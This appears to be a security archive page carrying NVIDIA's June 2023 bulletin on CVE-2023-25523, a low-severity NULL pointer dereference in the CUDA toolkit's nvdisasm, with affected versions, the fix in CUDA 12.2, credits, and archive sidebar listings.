*   Arbitrary (16,119)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,329)
*   DoS (23,289)
*   Encryption (2,363)
*   Exploit (51,413)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,628)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,791)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,067)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,709)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Adveris CMS 3.0 Cross Site Scripting


NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where an unprivileged user can cause an integer overflow, which may lead to information disclosure and denial of service.



CVE-2023-25516




NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.





**Details**

This section summarizes the potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors follow CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector and CWE**

CVE‑2023‑25523

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.

3.3

AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L  
CWE-476

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Updates**

The following table lists the software products and versions affected, and the updated version available from nvidia.com that includes this security update.

Download the update from the CUDA Toolkit Downloads page to apply the security update.

**CVEs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

CVE‑2023‑25523

NVIDIA CUDA Toolkit

Linux, Windows

All versions prior to CUDA Toolkit v12.2

CUDA Toolkit v12.2

**Notes**

*   Earlier software releases of this product are also affected. If you are using an earlier release, upgrade to the latest release version.

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

CVE‑2023‑25523: Jifan Xiao

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 29, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

Tag

#linux